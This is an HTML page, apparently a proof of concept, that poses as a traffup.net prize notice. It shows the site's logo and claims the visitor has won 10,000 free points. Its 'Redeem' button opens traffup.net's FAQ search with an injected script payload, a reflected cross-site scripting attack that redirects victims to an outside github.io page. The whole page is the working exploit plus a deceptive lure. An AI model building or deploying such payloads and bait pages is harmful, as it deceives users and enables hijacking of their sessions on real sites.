<html>
    <style>
        body {
            background: rgb(3,111,62);
            text-align: center;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
        }

        h2 {
            color: white;
        }

        .frm_btn {
            padding: 10px 20px;
            background: #1a73e8;
            font-size: 17px;
            cursor: pointer;
            display: inline-block;
            font-weight: normal;
            letter-spacing: normal;
            position: relative;
            text-decoration: none;
            color: #ffffff;
            transition: all 0.2s ease-out 0s;
            border-radius: 5px;
            border: 0px;
            outline: none;
            font-family: Arial, Helvetica, sans-serif,serif,tahoma;;
        }
    </style>
    <body>
        <section>
            <img src="https://traffup.net/images/logo_xmas.png">
            <div style="height: 50;"></div>
            <h2>Congratulations! You have won 10,000 free points. Redeem your coupon now.</h2>
            <button onclick="window.location.href='https://traffup.net/faq/?search=%22%20%3C/input%3E%20%3Cscript%3Ewindow.location.href=%27https://zxllkada-dev.github.io/test/%27;%3C/script%3E';" class="frm_btn">Redeem your coupon now</button>
        </section>
    </body>
</html>
